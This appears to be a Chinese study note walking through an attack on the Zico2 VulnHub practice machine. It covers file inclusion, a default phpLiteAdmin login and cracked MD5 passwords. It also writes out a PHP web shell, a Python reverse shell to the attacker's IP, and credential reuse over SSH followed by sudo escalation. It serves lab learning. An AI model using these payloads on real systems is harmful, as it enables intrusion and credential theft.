#免责声明:
本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。
Zico 2靶机
靶机下载地址 zico2: 1 ~ VulnHub
下载之后,本地解压,用VMware运行该虚拟机。
设置靶机 Zico 2 与攻击机网络环境,保证在同一局域网,方便都设置成net模式
主机发现与端口扫描
靶机MAC地址
nmap扫描 nmap -v -A 192.168.61.0/24
ip地址为192.168.61.144
开放了22、80、111端口
dirsearch目录扫描
web渗透
访问192.168.61.144
插件指纹识别
文件包含漏洞
首页点击
发现url处有page参数http://192.168.61.144/view.php?page=tools.html,可能存在文件包含漏洞
尝试查看/etc/passwd,呀呵,真有
访问/dbadmin/ 发现test_db.php是phpLiteAdmin v1.9.3的登陆页
尝试弱口令admin登录,好家伙进来了
info处找到可能是管理员root和普通用户zico的密码
653F4B285089453FE00E2AAFAC573414
96781A607F4E9F5F423AC01F0DAB0EBD
分别去md5解密:
34kroot34
zico2215@
刚刚注意到phpLiteAdmin版本为v1.9.3
百度下phpLiteAdmin漏洞,发现版本号小于等于1.9.3可能有代码执行漏洞
rce漏洞拿shell
去kali搜索该版本存在的漏洞
searchsploit phpLiteAdmin 1.9.3
下载24044.txt文件searchsploit -m 24044.txt
查看该文件
建一个名字叫 shell.php 的数据库
创建一个名叫 shell 的表
写入一句话木马 '<?php echo system($_GET["cmd"]); ?>'
结合文件包含漏洞,访问http://192.168.61.144/view.php?page=../../usr/databases/shell.php 访问成功
url拼接cmd=whoami成功执行命令
使用python反弹shell
url后拼接python命令
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.61.131",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
卡利开启8888监听
监听成功,使用命令显示当前路径
SHELL=/bin/bash script /dev/null
cd /home
cd wordpress
cat wp-config.php发现zico用户的密码sWfCsfJSPV9H3AmQzw8
拿到密码尝试ssh远程连接,连接成功
提权
sudo -l 查看有没有可利用的shell转义序列
利用sudo提权成功
靶场相关文章:Hack the Zico2 VM (CTF Challenge) - Hacking Articlesb